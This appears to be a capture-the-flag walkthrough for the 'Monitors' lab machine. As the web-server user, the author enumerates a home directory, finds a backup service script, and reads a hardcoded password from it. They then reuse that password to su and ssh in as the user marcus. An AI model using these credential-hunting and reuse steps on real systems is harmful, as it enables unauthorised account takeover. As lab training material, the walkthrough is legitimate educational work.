8 manual enum www-data
www-data@monitors:/home/marcus$ ls -la
total 40
drwxr-xr-x 5 marcus marcus 4096 Jan 25 2021 .
drwxr-xr-x 3 root root 4096 Nov 10 2020 ..
d--x--x--x 2 marcus marcus 4096 Nov 10 2020 .backup
lrwxrwxrwx 1 root root 9 Nov 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 marcus marcus 3771 Apr 4 2018 .bashrc
drwx------ 2 marcus marcus 4096 Jan 25 2021 .cache
drwx------ 3 marcus marcus 4096 Nov 10 2020 .gnupg
-rw-r--r-- 1 marcus marcus 807 Apr 4 2018 .profile
-r--r----- 1 root marcus 84 Jan 25 2021 note.txt
-r--r----- 1 root marcus 33 Oct 5 19:07 user.txt
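# .backup is execute-only (d--x--x--x): other users cannot list it, but can traverse it and open files whose names they already know
# can't find anything else; searching file contents globally for "marcus"
# narrowed the search to /etc, /tmp and /var; found this in /etc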
www-data@monitors:/$ grep -Rnw /etc -ie marcus --color=always 2>/dev/null
/etc/group-:52:marcus:x:1000:
/etc/subgid:3:marcus:165536:65536
/etc/group:52:marcus:x:1000:
/etc/passwd:29:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:8:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:3:marcus:165536:65536
/etc/passwd-:29:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Binary file /etc/alternatives/phar.phar matches
Binary file /etc/alternatives/php matches
Binary file /etc/alternatives/phar matches
# there's a cacti-backup.service unit whose ExecStart points into marcus's .backup directory
www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service
[Unit]
Description=Cacti Backup Service
After=network.target
[Service]
Type=oneshot
User=www-data
ExecStart=/home/marcus/.backup/backup.sh
[Install]
WantedBy=multi-user.target
# as www-data we couldn't list the /home/marcus/.backup dir; trying to read the file directly, since the unit file gives its full path
www-data@monitors:/$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
# Backup script referenced by cacti-backup.service (ExecStart): zips the Cacti
# directory into /tmp, copies the archive to 192.168.1.14 over scp, then removes
# the local copy.
backup_name="cacti_backup"
# NOTE(review): plaintext password stored in a script that the service account
# (www-data) can read, and handed to sshpass as a command-line argument.
# Key-based authentication for scp would remove the stored secret.
config_pass="VerticalEdge2020"
# NOTE(review): fixed, predictable archive name under /tmp; expansions are unquoted.
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
# NOTE(review): the scp source is /tmp/${backup_name} without the .zip suffix,
# so it does not match the archive created by the zip line above.
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
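# su to marcus works with the config_pass value from backup.sh (the backup password is reused as the account password)
# ssh also works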
$ ssh marcus@monitors.htb
marcus@monitors:~$ whoami;id
marcus
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)